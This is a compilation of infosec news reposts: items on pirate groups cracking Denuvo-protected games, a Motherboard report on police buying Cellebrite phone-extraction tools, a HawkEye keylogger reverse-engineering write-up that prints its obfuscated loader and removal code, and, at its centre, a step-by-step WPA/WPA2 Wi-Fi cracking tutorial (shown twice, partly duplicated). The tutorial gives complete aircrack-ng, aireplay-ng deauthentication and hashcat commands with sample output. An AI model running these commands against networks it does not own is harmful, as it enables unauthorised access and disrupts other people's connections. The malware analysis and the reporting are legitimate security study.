Now, the threat actors cracked Project CARS 3, a driving simulator developed by Slightly Mad Studios and Bandai Namco, the amazing thing is that this video game hasn’t even been officially released.

This game would arrive in stores on August 28, although it was hacked on August 25. Cracking was reportedly handled by the hackers of CODEX, a renowned video game hacking group that managed early access to Project CARS 3 thanks to the purchase of the DELUXE version.

Computer forensics experts mention that the game did not have great security protections, as it was only equipped with Steam‘s standard DRM protection, unlike other Games protected with Denuvo.

The third edition of Project CARS was expected by multiple members of the gamer community, as it now features multiple game modes, track varieties, cars and more additions. The game also features a virtual reality mode and will be available for PlaySation 4 and Xbox One.

The post Game Project CARS 3 was cracked & pirated 3 days before its release appeared first on Information Security Newspaper | Hacking News.

This time the affected product is Need for Speed: Heat, the latest release of the famous car racing video game franchise. According to the developers, this new installment features notable improvements in graphics, a new story and update of the controls.

According to researchers in digital forensics, since its release thousands of gamers have browsed the Internet in search of the cracked version of the game and, despite the fact that multiple websites, specialized forums and YouTube channels claim to have the answer, almost all of these claims are fake, as these pages contained only clickbait, which was verified by CrackWatch, a platform dedicated to check the security status of newly released video games.

As reported, this video game has the digital rights security system known as Denuvo, so the product has protection against copying, at least until hackers manage to remove this system from the video game code.

Although Denuvo is one of the most advanced video game security systems, various hacker groups have already managed to eliminate this protection from games, besides that the system is not very popular with gamers, as they consider that their implementation increases resource consumption on a console, as well as affecting game performance.

Although Need for Speed seemed to have advanced protections, important hacker groups such as CPY, Voski, Reloaded, CODEX, among others, set their sights on this video game, so the release of the cracked version became a matter of time.

Finally, according to digital forensic specialists from the International Institute of Cyber Security (IICS), it was only 49 days after the release of the game for hackers to release a cracked version. Rumors were confirmed by CrackWatch in an update to the state of the game.

It is necessary to remind video game enthusiasts that, while resorting to these versions saves a few dollars, the risk of installing a cracked video game is very high, as it can actually be dangerous malware variants capable of completely compromise the infected system.

The post Need for speed NFS HEAT cracked and hacked in less than 50 days after launch appeared first on Information Security Newspaper | Hacking News.

The Denuvo protection system has become almost a standard in the video game industry, as developer companies implement it to protect their new products from piracy for at least a couple of months after its release. This doesn’t always work, as some hackers take just a couple of days to break protection, creating security holes that allow them to bypass the system to run pirated copies of the games.

However, this occasion is different, as ethical hacking experts say that hackers managed to completely remove the protection system with the intention of verifying whether Denuvo actually affects the performance of a video game. The hackers delivered this released version to some users on the Internet, who will have to test it to determine the real impact of the implementation of this system on a video game.

In the past, thousands of “gamers” have shown their dissatisfaction with the use of Denuvo, arguing that its implementation increases the use of console resources, generates lower performance in graphics aspects of the game, and increases latency. What is true is that, as a part of the game, Denuvo increases the files weight, although some users doubt whether it actually reduces the graphic quality of the game.

Removing these protection systems is a really complex task, and to achieve this, hackers had to remove VMProtect and Denuvo entry points from the executable, repairing data files and game code.

According to specialists in ethical hacking from the International Institute of Cyber Security (IICS) Denuvo is one of the most widely used video game crack protection tools today and, because it is installed directly in the code, it is runs as one more element of the game, hence the complexity of eliminating it, not just finding a way to bypass it.

The post Hackers crack Assassin’s Creed Origins; Denuvo & VMProtect completely removed appeared first on Information Security Newspaper | Hacking News.

This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use.

This tutorial assumes that you:

• Have a general comfortability using the command-line
• Are running a debian-based linux distro, preferably Kali linux
• Have Aircrack-ng installed
  • sudo apt-get install aircrack-ng
• Have a wireless card that supports monitor mode

Cracking a Wi-Fi Network – Monitor Mode

Begin by listing wireless interfaces that support monitor mode with:

airmon-ng

If you do not see an interface listed then your wireless card does not support monitor mode

We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:

airmon-ng start wlan0

Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).

For the purposes of this demo, we will choose to crack the password of my network, “hackme”. Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.

Capture a 4-way Handshake

WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don’t have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work, information security training experts said. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.

Once you’ve captured a handshake, you should see something like; WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.

Also you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake.

Once you’ve captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. The information security training professional rename this file to reflect the network name we are trying to crack:

mv ./-01.cap hackme.cap

The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I’ve created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don’t have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.

Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users leave unchanged. If you are attempting to crack one of these passwords, the information security training expert recommend using the Probable-Wordlists WPA-length dictionary files.

Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you’ve cracked the password, you should see something like this as the contents of your POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

Where the last two fields separated by : are the network name and password respectively.

Deauth Attack

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake “sender” addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng.

Use airodump-ng to monitor a specific access point (using -c channel –bssid MAC) until you see a client (STATION) connected. A connected client look something like this, where is 64:BC:0C:48:97:F7 the client MAC.

Once you’ve sent the deauth packets, head back over to your airodump-ng process, and with any luck you should now see something like this at the top right; WPA handshake: 9C:5C:8E:C9:AB:C0. Now that you’ve captured a handshake you should be ready to crack the network password, information security training professional said.

The post Wi-Fi Cracking appeared first on Information Security Newspaper | Hacking News.

If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at the bottom. This tutorial is also posted on GitHub. Read it there for the most up-t0-date version and BASH syntax highlighting.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don’t be a dick.

Getting Started

This tutorial assumes that you:

• Have a general comfortability using the command-line
• Are running a debian-based linux distro (preferably Kali linux)
• Have Aircrack-ng installed (sudo apt-get install aircrack-ng)
• Have a wireless card that supports monitor mode (I recommend this one. See here for more info.)

Cracking a Wi-Fi Network

Monitor Mode

Begin by listing wireless interfaces that support monitor mode with:

airmon-ng

If you do not see an interface listed then your wireless card does not support monitor mode ?

We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:

airmon-ng start wlan0

Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).

Find Your Target

Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:

airodump-ng mon0

You should see output similar to what is below.

CH 13 ][ Elapsed: 52 s ][ 2017–07–23 15:49 
 
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
 
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests 
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0> 
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro 
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme 
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin’s Awesome 
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2 
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2 
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT 
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root 
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

For the purposes of this demo, we will choose to crack the password of my network, “hackme”. Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.

Capture a 4-way Handshake

WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don’t have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.

# replace -c and — bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 — bssid 9C:5C:8E:C9:AB:C0 -w . mon0

CH 6 ][ Elapsed: 1 min ][ 2017–07–23 16:09 ] 
 
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
 
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS

Now we wait… Once you’ve captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.

If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.

Once you’ve captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:

mv ./-01.cap hackme.cap

Crack the Network Password

The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I’ve created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don’t have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.

Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.

Cracking With naive-hashcat (recommended)

Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/or using the cap2hccapx tool directly.

cap2hccapx.bin hackme.cap hackme.hccapx

Next, download and run naive-hashcat:

# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you’ve cracked the password, you should see something like this as the contents of your POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

Where the last two fields separated by : are the network name and password respectively.

If you would like to use hashcat without naive-hashcat see this page for info.

Cracking With Aircrack-ng

Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:

# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Note, that if the network password is not in the wordlist you will not crack the password.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.

Aircrack-ng 1.2 beta3

[00:01:49] 111040 keys tested (1017.96 k/s)

KEY FOUND! [ hacktheplanet ]

Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 
 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E

Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 
 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 
 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 
 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21

EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Deauth Attack

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake “sender” addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng.

Use airodump-ng to monitor a specific access point (using -c channel --bssid MAC) until you see a client (STATION) connected. A connected client look something like this, where is 64:BC:0C:48:97:F7 the client MAC.

CH 6 ][ Elapsed: 2 mins ][ 2017–07–23 19:15 ] 
 
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
 
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS 
 
BSSID STATION PWR Rate Lost Frames Probe 
 
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS

Now, leave airodump-ng running and open a new terminal. We will use the aireplay-ng command to send fake deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process.

# -0 2 specifies we would like to send 2 deauth packets. Increase this number
# if need be with the risk of noticably interrupting client network activity
# -a is the MAC of the access point
# -c is the MAC of the client
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

You can optionally broadcast deauth packets to all connected clients with:

# not all clients respect broadcast deauths though
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0

Once you’ve sent the deauth packets, head back over to your airodump-ngprocess, and with any luck you should now see something like this at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Now that you’ve captured a handshake you should be ready to crack the network password.

List of Commands

Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng… ##########

# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

# convert cap to hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Attribution

Much of the information presented here was gleaned from Lewis Encarnacion’s awesome tutorial. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Source:https://medium.com/@brannondorsey/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat-a5a5d3ffea46

The post Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat appeared first on Information Security Newspaper | Hacking News.

State police forces and highway patrols in the US have collectively spent millions of dollars on this sort of technology to break into and extract data from mobile phones, according to documents obtained by Motherboard. Over 2,000 pages of invoices, purchase orders, communications, and other documents lay out in unprecedented detail how one company in particular has cornered the trade in mobile phone forensics equipment across the United States.

Cellebrite, an Israel-based firm, sells tools that can pull data from most mobile phones on the market, such as contact lists, emails, and wiped messages. Cellebrite’s products can also circumvent the passcode locks or other security protections on many current mobile phones. The gear is typically used to gather evidence from a criminal suspect’s device after it has been seized, and although not many public examples of abuse are available, Cellebrite’s tools have been used by non-US authorities to prosecute dissidents.

Previous reports have focused on federal agencies’ acquisition of Cellebrite tools. But as smartphones have proliferated and increasingly become the digital center of our lives, the demand and supply of mobile forensics tools has trickled down to more local bodies.

UFED Touch2 Platform. Cellebrite screengrab

Cellebrite has sold its wares to regional agencies in 20 states, and likely many more, according to the cache of documents acquired by Motherboard. Those items specifically include Cellebrite’s range of Universal Forensic Extraction Devices (UFED); the typically laptop-sized or handheld devices for hoovering up data from phones. Some of the agencies note in the documents that they use the technology for legal searches of devices.

Cellebrite does not publicly comment on its customers, and did not respond to a request for an interview on the company’s US strategy.

According to a spreadsheet detailing what models of phones Cellebrite can handle, the UFED can extract data from thousands of different mobile devices. It can’t, however, extract the passcode on the iPhone 4s or above.

“We use it for any and all crimes,” Nate McLaren, Special Agent in Charge at the Iowa Department of Public Safety’s Cyber Crime Unit and Internet Crimes Against Children Task Force, told Motherboard in a phone call. “Anywhere we think there might be a digital footprint or a digital fingerprint.”

To get a better idea of the extent mobile phone forensics technology has trickled down from the federal level, Motherboard filed public record access requests with state police forces and highway patrols in every US state, asking for records from 2010 to this year. Some agencies diverted the request to respective state Department of Public Safety or other similar institutions. Others declined to release the records, pointing to exemptions in local law; a few demanded excessively high fees for the documents to be released, and some did not respond to the requests at all. Some agencies only retained related records for five years, so provided those.

In all, Motherboard has obtained documents from agencies in 20 states, including the Illinois State Police, Missouri State Highway Patrol, and Arizona Department of Public Safety. (The cache of documents is included at the end of this article, as well as spreadsheets created by Motherboard breaking down each agency’s expenditure.)

As our investigation found, most of the agencies spent tens of thousands of dollars acquiring Cellebrite’s phone cracking and forensic UFEDs. Cellebrite sells several different versions of the UFED, which either comes as an actual device—the UFED Touch, Ultimate, or Pro—or a piece of software for a computer called UFED4PC.

In short, there are two main ways Cellebrite’s UFEDs extract data from devices: either in a logical form, or a physical form.

“Logical is what-you-see-is-what-you-get,” Rene Novoa, senior manager at forensics company DriveSavers Data Recovery, told Motherboard in a phone call, referring to whatever data is immediately available on the phone. This likely includes messages, photos, or the information in databases generated by apps. Physical extraction, meanwhile, allows the retrieval of hidden or deleted material.

Getting around many phone’s passcodes is easy pickings for the UFED too.

“That is sort of built into their product: We do have the ability to get past many passcodes,” Novoa continued, referring to his own use of Cellebrite products. Once an investigator has broken into the phone, they can export chat messages in a conversation format and create PDF reports.

According to one memorandum from the Delaware State Police Criminal Intelligence and Homeland Security Section, the UFED can be used with little to no training.

But the vast majority of the agencies’ expenditure went on renewing annual licenses for Cellebrite products. If police forces want to be able to pull data from the latest phones, they have to keep paying subscription costs to the Cellebrite service. The Arizona Department of Public Safety spent around $110,000 over three years on these subscriptions alone. The Illinois State Police spent just over $45,000 on renewals, and the Iowa Department of Public Safety spent around $92,000.

Some funds were used to trade-in one Cellebrite model for another, and to a lesser degree, some forces paid for extra training in how to use the forensics gear.

Agencies also spent tens of thousands of dollars on other Cellebrite products,including Link Analysis, a piece of software that visualizes data pulled from phones into easy to understand graphs, allowing investigators to quickly map out relationships between multiple individuals’ contacts, or a device’s GPS location across time.

Some agencies did buy equipment from other mobile phone forensics providers. There’s BlackBag, which has a particularly good reputation for extracting data from

Source:https://motherboard.vice.com/

The post US State Police Have Spent Millions on Israeli Phone Cracking Tech appeared first on Information Security Newspaper | Hacking News.

Actually ‘HawkEye’ is best known in the AV industry by ‘Golroted’. In fact it seems that ‘HawkEye’ was using a different name before, ‘Predator Keylogger’, as you can see in this postfrom stopmalvertising. I’m not sure if the author(s) behind them are the same. The source code might have been shared/sold among some malicious software writers.

After a bit of digging I could also find some previous versions of ‘HawkEye’ cracked. However, it seemed, at first, that the previous versions were a bit different from the latest ‘Reborn’ version. ‘HawkEye’ didn’t look an advanced piece of malware and the authors/sellers apparently are doing a sloppy job. The lesson here is even a sloppy malware writers can make a profit without hiding themselves that much.

While searching the web I’ve found a few ‘HawkEye’ technical analysis (see references at the end of this blog post), and while poking around I ended on the home page of ‘HawkEye’. It is sold for more or less $35, depending on each type of license you are interested in. At the time of this writing the home page is down, it should come up again at some point. During the last month I noticed that it goes down and comes back from time to time.

I noticed one interesting thing though. Maybe due to a misconfiguration (or not) I could download ‘HawkEye Keylogger Reborn’ and some other malicious software that the same author is selling. From https://hawkspy.net/hawkeye-keylogger-reborn/ I was redirected to https://selfypay.org/HawkSpy/ and… guess what? All their software belongs to us…

‘HawkEye Keylogger – Reborn.exe’
SHA256: c8164521267263190900e1f62494068e994b053ae720d678da542e80286b5f46

So I had access to the “potential” builder and not only to the samples that were collected on the wild and mentioned on the technical articles I’ve found. So I decided to have a look and opened it in CFF Explorer.

CFF Explorer is like PEStudio for .net assemblies and it tells us that this file is indeed a .net binary.

Dynamic Analysis

So I downloaded it and ran it on a VM. No anti-VM techniques were in use, at least none able to detected my VMware based virtual lab. If ‘HawkEye’ doesn’t have access to the Internet the program will throw an Exception and writes a file ‘loader.log’ on the same directory from where the exe was launched.

1
2
3
4
5
6
7
8

8/1/2016 6:41:35 PM

The operation has timed out
   at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request)
   at System.Net.WebClient.DownloadString(Uri address)
   at System.Net.WebClient.DownloadString(String address)
   at HawkEyeKeyloggerReborn.License.DownloadChecksums()
   at HawkEyeKeyloggerReborn.License.Initialize()

Since I was monitoring the DNS queries I could see that it tries to resolve the host ‘seal.nimoru.com’. Ok, I fired up my Tor Proxy VM and this time I was presented with a login form, as shown below.

I did a quick search for ‘Net Seal’ (shown in the title bar of the login dialog box) but at this time I didn’t find anything (more on this later).

Reverse Engineering Managed Code

Managed code decompilers are the way to go when analysing .NET assemblies since they allow us to decompile the binary into source code. However, if the binary is obfuscated, this process can be a nightmare. Besides the managed code decompilers are not as amazing as you may think if you are dealing with complex projects. Almost all of them allow you to export the code, even to Visual Studio projects. Getting this projects to compile is a complete different story though. Based on my experience 99% of times it will not build and you have to deal with too many errors. Most of the errors are completely ‘alien’. Still, decompilers are great.

So I loaded ‘HawkEye Keylogger – Reborn.exe’ in ILSpy, I could see the file was encrypted/obfuscated with a module called ‘MindZero v0.5.0-custom’.

I looked around but I couldn’t find any reference to MindZero .net code obfuscator or anything close on the Internet. I tried a couple of tools in order to try to identify the packer/obfuscator used. Some wrongly indicated that Confuser was used.

The only methods exposed, as you can see bellow, were ZeroMind(), Zero(), Mind(), Decompress(), and a few others.

The method Zero() and ZeroMind() were quite interesting. One of the immediate things I noticed was the use of Reflection and LoadModule. More on this later.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

// <Module>
[System.STAThread, System.STAThread]
private static int Zero(string[] array)
{
    uint[] array2 = new uint[]
    {
        3154793535u,
        2510551337u,
        1068474031u,
        3134659130u,
        1935703431u,
        3462704481u,
        729329793u,
(** LARGE ARRAY CUT **)
        1847557079u,
        2466235288u,
        4233368770u,
        1709265185u,
        3912996699u,
        1356851460u
    };
    System.Reflection.Assembly executingAssembly = System.Reflection.Assembly.GetExecutingAssembly();
    System.Reflection.Module manifestModule = executingAssembly.ManifestModule;
    System.Runtime.InteropServices.GCHandle gCHandle = <Module>.Mind(array2, 640387902u);
    byte[] array3 = (byte[])gCHandle.Target;
    System.Reflection.Module module = executingAssembly.LoadModule("MZ", array3);
    System.Array.Clear(array3, 0, array3.Length);
    gCHandle.Free();
    System.Array.Clear(array2, 0, array2.Length);
    <Module>.key = manifestModule.ResolveSignature(285212673);
    System.AppDomain.CurrentDomain.AssemblyResolve += new System.ResolveEventHandler(<Module>.ZeroMind);
    module.GetTypes();
    System.Reflection.MethodBase methodBase = module.ResolveMethod((int)<Module>.key[0] | (int)<Module>.key[1] << 8 | (int)<Module>.key[2] << 16 | (int)<Module>.key[3] << 24);
    object[] array4 = new object[methodBase.GetParameters().Length];
    if (array4.Length != 0)
    {
        array4[0] = array;
    }
    object obj = methodBase.Invoke(null, array4);
    if (obj is int)
    {
        return (int)obj;
    }
    return 0;
}

After reading quite a lot about .net binaries Reverse Engineering (see the ‘References’) I decided to use first a memory dumper and then go from there.

So I used ‘MegaDumper 1.0 by CodeCracker / SnD’. You can find it in some Reverse Engineering Forums. Basically I executed ‘HawkEye Keylogger – Reborn.exe’, fired ‘MegaDumper’, selected the process corresponding to ‘HawkEye’ (stuck on the ‘Net Seal’ login prompt) and selected the option to dump the loaded assembly.

The result was an interesting collection of executable and dll files.

I loaded almost every file in ILSpy and found some interesting things. The ‘Cure.exe’ was the vacine to ‘HawkEye’. Meaning if you infected a computer and you want to clean it you should run this file. Here’s the interesting code showing some of the IOCs already mentioned in some of the articles I mentioned before.

Bellow is the code with the most interesting methods for Blue Teams.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266

        private void Form1_Load(object sender, EventArgs e)
        {
            try
            {
                this.seekanddestroy("vbc");
                Thread.Sleep(300);
                this.seekanddestroy("temp");
                Thread.Sleep(300);
                this.seekanddestroy("Pin");
                Thread.Sleep(300);
                this.seekanddestroy("Windows Update");
                Thread.Sleep(300);
                this.seekanddestroy("WindowsUpdate");
                Thread.Sleep(500);
                this.seekanddestroy("Microsoft");
            }
            catch (Exception expr_83)
            {
                ProjectData.SetProjectError(expr_83);
                ProjectData.ClearProjectError();
            }
            try
            {
                bool flag = !File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\pid.txt");
                if (!flag)
                {
                    int processId = Conversions.ToInteger(File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\pid.txt"));
                    Process.GetProcessById(processId).Kill();
                    Thread.Sleep(500);
                }
            }
            catch (Exception arg_EC_0)
            {
                ProjectData.SetProjectError(arg_EC_0);
                ProjectData.ClearProjectError();
            }
            try
            {
                bool flag = !File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\pidloc.txt");
                if (!flag)
                {
                    string path = File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\pidloc.txt");
                    flag = File.Exists(path);
                    if (flag)
                    {
                        File.Delete(path);
                    }
                }
                flag = File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\pid.txt");
                if (flag)
                {
                    File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\pid.txt");
                }
                flag = File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\pidloc.txt");
                if (flag)
                {
                    File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\pidloc.txt");
                }
            }
            catch (Exception expr_1B5)
            {
                ProjectData.SetProjectError(expr_1B5);
                ProjectData.ClearProjectError();
            }
            Thread thread = new Thread(new ThreadStart(this.builderclean));
            thread.SetApartmentState(ApartmentState.STA);
            thread.IsBackground = true;
            thread.Start();
            Thread thread2 = new Thread(new ThreadStart(this.serverclean));
            thread2.SetApartmentState(ApartmentState.STA);
            thread2.IsBackground = true;
            thread2.Start();
            checked
            {
                try
                {
                    DirectoryInfo directoryInfo = new DirectoryInfo("C:\\Users\\" + this.User + "\\AppData\\Roaming\\jagex_cache\\regPin");
                    FileInfo[] files = directoryInfo.GetFiles();
                    bool flag;
                    for (int i = 0; i < files.Length; i++)
                    {
                        FileInfo fileInfo = files[i];
                        flag = fileInfo.Extension.Equals(".jpeg");
                        if (flag)
                        {
                            fileInfo.Delete();
                        }
                    }
                    Thread.Sleep(1000);
                    flag = Directory.Exists("C:\\Users\\" + this.User + "\\AppData\\Roaming\\jagex_cache\\regPin");
                    if (flag)
                    {
                        Directory.Delete("C:\\Users\\" + this.User + "\\AppData\\Roaming\\jagex_cache\\regPin");
                    }
                    DirectoryInfo directoryInfo2 = new DirectoryInfo("C:\\Users\\" + this.User + "\\AppData\\Roaming\\jagex_cache\\reg");
                    FileInfo[] files2 = directoryInfo2.GetFiles();
                    for (int j = 0; j < files2.Length; j++)
                    {
                        FileInfo fileInfo2 = files2[j];
                        flag = fileInfo2.Extension.Equals(".jpeg");
                        if (flag)
                        {
                            fileInfo2.Delete();
                        }
                    }
                    Thread.Sleep(3000);
                    flag = Directory.Exists("C:\\Users\\" + this.User + "\\AppData\\Roaming\\jagex_cache\\reg");
                    if (flag)
                    {
                        Directory.Delete("C:\\Users\\" + this.User + "\\AppData\\Roaming\\jagex_cache\\reg");
                    }
